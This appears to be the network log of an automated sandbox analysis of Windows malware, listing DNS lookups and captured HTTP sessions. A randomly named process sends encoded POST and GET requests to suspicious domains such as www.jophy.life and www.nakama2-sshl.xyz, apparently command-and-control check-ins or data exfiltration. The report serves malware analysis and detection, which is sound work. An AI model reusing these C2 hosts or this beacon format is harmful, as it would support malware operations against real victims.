                                                                                Oct 10, 2024 14:39:41.698427916 CEST1.1.1.1192.168.2.50xa0aeNo error (0)www.trapkitten.website195.161.68.8A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:16.441535950 CEST1.1.1.1192.168.2.50x9e57Name error (3)www.48vlu.shopnonenoneA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)www.085bet.xyzp-kc352zjcdn.abcty1.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)p-kc352zjcdn.abcty1.comef6f8e2a.abcty2.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)ef6f8e2a.abcty2.comcluster580fc23f.abcty2.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com45.194.36.12A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com154.198.53.36A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com154.198.53.47A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com27.0.235.160A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com27.0.235.49A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com185.121.169.26A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com27.0.235.36A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com27.0.235.55A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com45.194.36.61A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.791829109 CEST1.1.1.1192.168.2.50xe6c1No error (0)cluster580fc23f.abcty2.com103.244.226.202A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:38.585716009 CEST1.1.1.1192.168.2.50x3bc7No error (0)www.rjscorp.orgrjscorp.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:38.585716009 CEST1.1.1.1192.168.2.50x3bc7No error (0)rjscorp.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:38.585716009 CEST1.1.1.1192.168.2.50x3bc7No error (0)rjscorp.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:51.767798901 CEST1.1.1.1192.168.2.50xff96Name error (3)www.pussy.couponsnonenoneA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:41:00.047595024 CEST1.1.1.1192.168.2.50x2710No error (0)www.mudanya-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:41:00.047595024 CEST1.1.1.1192.168.2.50x2710No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:41:00.047595024 CEST1.1.1.1192.168.2.50x2710No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.wdeb18.top
                                                                                • www.jophy.life
                                                                                • www.nakama2-sshl.xyz
                                                                                • www.comedy.finance
                                                                                • www.trapkitten.website
                                                                                • www.085bet.xyz
                                                                                • www.rjscorp.org
                                                                                • www.mudanya-nakliyat.xyz

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549770206.119.82.14780760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:38:44.399358988 CEST338OUTGET /vy4k/?PJ9L=d32l86geEWYHZjxTvbwjbSU9LAKscW6mTUIXWgcYKnqJcO8pcs3M8TeLmvZmGSd++zsCnZUgxj5ZgSRZm5GNnST7Zdxi7nq5Mi/W1p3900gY77wjz5lHrGRPWDQkbfDtqg==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.wdeb18.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:38:45.296657085 CEST302INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 10 Oct 2024 12:38:45 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "66aa3fcf-8a"
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549865162.0.238.24680760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:00.658725023 CEST595OUTPOST /umni/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jophy.life
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.jophy.life
                                                                                Referer: http://www.jophy.life/umni/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 45 6b 43 7a 42 50 4b 67 6a 2b 62 46 74 38 75 4d 6c 66 48 35 77 4b 7a 38 58 6a 72 66 42 4a 79 43 2b 78 45 6c 39 54 72 6f 38 66 4d 51 36 72 4e 2f 44 62 61 62 63 4b 55 72 71 79 76 59 30 39 6a 31 44 37 6d 33 31 58 67 79 72 48 4c 71 4e 4a 34 6a 6c 61 36 71 38 70 79 46 4a 50 54 38 73 54 33 6d 51 45 31 62 33 75 6f 42 52 66 55 4d 37 78 63 68 5a 38 74 4d 45 6b 38 76 6a 32 4e 64 62 32 61 74 75 44 4d 71 76 66 44 6f 55 43 72 6b 4d 4a 70 46 61 64 73 6d 62 6b 4f 6e 33 4a 33 2f 6a 2f 31 76 43 4d 54 37 77 74 55 58 58 31 54 37 62 6c 6a 45 77 4f 7a 74 2b 30 4d 6a 32 6d 49 67 46 77 6b 77 70 37 4b 48 74 78 51 3d
                                                                                Data Ascii: PJ9L=EkCzBPKgj+bFt8uMlfH5wKz8XjrfBJyC+xEl9Tro8fMQ6rN/DbabcKUrqyvY09j1D7m31XgyrHLqNJ4jla6q8pyFJPT8sT3mQE1b3uoBRfUM7xchZ8tMEk8vj2Ndb2atuDMqvfDoUCrkMJpFadsmbkOn3J3/j/1vCMT7wtUXX1T7bljEwOzt+0Mj2mIgFwkwp7KHtxQ=
                                                                                Oct 10, 2024 14:39:01.257863998 CEST595INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 10 Oct 2024 12:39:01 GMT
                                                                                Server: Apache
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Content-Length: 389
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549881162.0.238.24680760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:03.212733030 CEST615OUTPOST /umni/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jophy.life
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.jophy.life
                                                                                Referer: http://www.jophy.life/umni/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 45 6b 43 7a 42 50 4b 67 6a 2b 62 46 73 66 6d 4d 6a 34 7a 35 6e 61 79 4f 4b 54 72 66 4f 70 79 5a 2b 77 34 6c 39 52 47 33 38 4a 63 51 36 4b 52 2f 43 65 75 62 62 4b 55 72 69 53 76 64 77 39 6a 2b 44 37 36 46 31 56 6b 79 72 48 66 71 4e 49 49 6a 6c 4a 43 70 39 35 79 44 46 76 54 79 76 6a 33 6d 51 45 31 62 33 75 38 72 52 66 4d 4d 37 68 4d 68 4c 49 42 44 62 55 38 75 7a 6d 4e 64 66 32 61 70 75 44 4d 49 76 65 76 43 55 41 6a 6b 4d 4d 74 46 61 4a 34 6c 51 6b 4f 68 35 70 32 39 71 74 31 6d 45 38 53 7a 33 50 4a 78 4c 32 48 39 61 54 4f 75 71 73 37 46 74 55 67 62 6d 31 41 58 55 41 46 5a 7a 59 61 33 7a 6d 48 47 35 46 6c 69 31 70 67 33 62 68 54 42 74 4b 37 63 56 37 6c 73
                                                                                Data Ascii: PJ9L=EkCzBPKgj+bFsfmMj4z5nayOKTrfOpyZ+w4l9RG38JcQ6KR/CeubbKUriSvdw9j+D76F1VkyrHfqNIIjlJCp95yDFvTyvj3mQE1b3u8rRfMM7hMhLIBDbU8uzmNdf2apuDMIvevCUAjkMMtFaJ4lQkOh5p29qt1mE8Sz3PJxL2H9aTOuqs7FtUgbm1AXUAFZzYa3zmHG5Fli1pg3bhTBtK7cV7ls
                                                                                Oct 10, 2024 14:39:03.821419001 CEST595INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 10 Oct 2024 12:39:03 GMT
                                                                                Server: Apache
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Content-Length: 389
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549896162.0.238.24680760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:05.763079882 CEST1632OUTPOST /umni/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.jophy.life
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.jophy.life
                                                                                Referer: http://www.jophy.life/umni/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 45 6b 43 7a 42 50 4b 67 6a 2b 62 46 73 66 6d 4d 6a 34 7a 35 6e 61 79 4f 4b 54 72 66 4f 70 79 5a 2b 77 34 6c 39 52 47 33 38 4a 55 51 36 59 31 2f 44 39 47 62 61 4b 55 72 68 53 76 63 77 39 6a 76 44 37 79 37 31 56 35 50 72 46 6e 71 4e 71 41 6a 79 49 43 70 32 35 79 44 59 2f 54 2f 73 54 32 6b 51 45 6c 66 33 75 73 72 52 66 4d 4d 37 6e 41 68 62 4d 74 44 64 55 38 76 6a 32 4e 52 62 32 61 52 75 44 6b 35 76 65 72 34 56 77 44 6b 4e 73 64 46 59 38 73 6c 64 6b 4f 6a 36 70 32 66 71 74 34 2b 45 38 50 4b 33 4f 73 57 4c 32 76 39 61 33 7a 75 2b 66 7a 74 70 53 34 2b 6b 6c 59 47 4a 57 78 6e 31 37 4f 57 79 47 6e 77 7a 6d 46 33 30 4f 6c 79 5a 68 43 61 2f 2f 62 50 5a 39 63 41 6a 4d 65 66 72 72 42 56 5a 68 46 51 54 76 5a 61 50 71 48 54 47 70 63 74 45 39 62 70 6a 4e 65 39 39 56 67 78 34 30 66 75 36 37 4f 64 2f 35 2f 54 6d 4f 73 66 44 37 61 6a 38 64 61 41 71 4b 4a 56 70 50 4a 39 52 30 66 41 54 71 71 32 43 4e 72 47 54 2f 57 77 43 77 63 77 56 58 77 32 5a 72 39 53 54 54 50 31 4e 2f 2f 42 39 68 4f 77 76 54 4e 64 74 [TRUNCATED]
                                                                                Data Ascii: PJ9L=EkCzBPKgj+bFsfmMj4z5nayOKTrfOpyZ+w4l9RG38JUQ6Y1/D9GbaKUrhSvcw9jvD7y71V5PrFnqNqAjyICp25yDY/T/sT2kQElf3usrRfMM7nAhbMtDdU8vj2NRb2aRuDk5ver4VwDkNsdFY8sldkOj6p2fqt4+E8PK3OsWL2v9a3zu+fztpS4+klYGJWxn17OWyGnwzmF30OlyZhCa//bPZ9cAjMefrrBVZhFQTvZaPqHTGpctE9bpjNe99Vgx40fu67Od/5/TmOsfD7aj8daAqKJVpPJ9R0fATqq2CNrGT/WwCwcwVXw2Zr9STTP1N//B9hOwvTNdt4tvxb9y5p96yi4SkmVkzkvdkPvQ3j/34gXcmJ+SNMYa0TF53tABO8ojsdX6+1y3lmsh55jWDpCo8/bAzSjT1h71r7UUca51fNJEAEcF7uYGunZAt2RIFzjdZ4TU8ScNGhZMbBmM7TdyX2GkBA7A0dYCCKsiZf16S8UxtM7oW5bkoeA9llo87+TQz5TU4Tl4sxcJWCJn/CoTb2EAJmrubgU+rouBGoN2wHKIhzXe/+KjwuC0f3YQ3E2YCNSV7uFOLLiHl3qIp1rCrvdHu17IRTG6zIvFQqFSusg9MSnKGDJl8TDCwnPvmnOLMVAgoJA67amppeAQC1OuhokZN4csjdpP/WdmebB9EcOTYa4OkR8BXn7YZxjcIWk0G43/T4l/e3oScAL7Z4CfjSvH8vXU/qmKw8YQEnu3aMRF5wqHpB7LMOkC1ME8GXK/6Y7EFvTpNY6ZFfxd7HOXHxEto5TwJJxd+0ammBGogufrfxRO5A0p+T8k67mUbIrx1LrRYqWwlfwqI6mYZM+8UZL1Oo/p15Am8pZ7ULC5UhVMjkRLqzubxjD8W+HOcyqTeLfhJroLZ//Hf+togSLScCAmay38mOWZdaNIoWFkSwq9esP1bgKOq7s2otD+awQ96ziNPGHu7Bhzh1ePZzuT2yI8v37LeeDUCVbja3sRuwK [TRUNCATED]
                                                                                Oct 10, 2024 14:39:06.391408920 CEST595INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 10 Oct 2024 12:39:06 GMT
                                                                                Server: Apache
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Content-Length: 389
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549914162.0.238.24680760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:08.297925949 CEST338OUTGET /umni/?2z=PtRhXbM&PJ9L=JmqTC62v8P7mi6uPhLDAp9iaIjXSB8PwqG0a5mqRptE5j7gES97YNZljt2Ht2eKQTLeZ3UNIpnjTdZAH1rWC29igZO3jlkfdeSpr3eIJWfELnBNobLhFHVBS/RUmS3PasQ== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.jophy.life
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:39:08.912643909 CEST610INHTTP/1.1 404 Not Found
                                                                                Date: Thu, 10 Oct 2024 12:39:08 GMT
                                                                                Server: Apache
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Content-Length: 389
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549946183.181.83.13180760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:39:14.463089943 CEST613OUTPOST /bgpi/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nakama2-sshl.xyz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.nakama2-sshl.xyz
                                                                                Referer: http://www.nakama2-sshl.xyz/bgpi/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 56 52 70 4e 71 73 4a 39 48 78 74 58 53 2b 74 50 56 33 76 74 6f 31 2b 75 36 57 61 6d 71 51 77 30 50 5a 38 46 5a 64 73 50 69 4e 44 2f 52 47 4c 4c 33 70 4e 7a 57 72 2b 70 77 69 2f 79 6a 54 30 6c 33 6c 46 61 44 67 36 53 45 49 75 6c 77 47 69 53 73 59 63 79 2b 6f 4f 72 72 6a 4f 72 48 42 37 58 41 5a 37 71 62 50 77 79 7a 50 2b 50 33 57 35 58 57 61 58 78 50 55 30 35 39 4f 6b 69 44 39 4c 58 4d 65 54 44 35 6c 6e 79 41 2b 52 6b 4e 67 62 7a 6b 71 47 58 31 66 6c 53 71 53 45 6b 47 73 38 70 73 62 45 2f 4d 77 4a 63 4f 43 50 4d 57 73 4f 38 53 6f 57 45 4d 71 67 6e 66 38 70 44 73 4a 4b 44 41 68 36 35 2b 6f 63 3d
                                                                                Data Ascii: PJ9L=VRpNqsJ9HxtXS+tPV3vto1+u6WamqQw0PZ8FZdsPiND/RGLL3pNzWr+pwi/yjT0l3lFaDg6SEIulwGiSsYcy+oOrrjOrHB7XAZ7qbPwyzP+P3W5XWaXxPU059OkiD9LXMeTD5lnyA+RkNgbzkqGX1flSqSEkGs8psbE/MwJcOCPMWsO8SoWEMqgnf8pDsJKDAh65+oc=
                                                                                Oct 10, 2024 14:39:15.300189018 CEST1236INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 10 Oct 2024 12:39:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                Content-Encoding: br
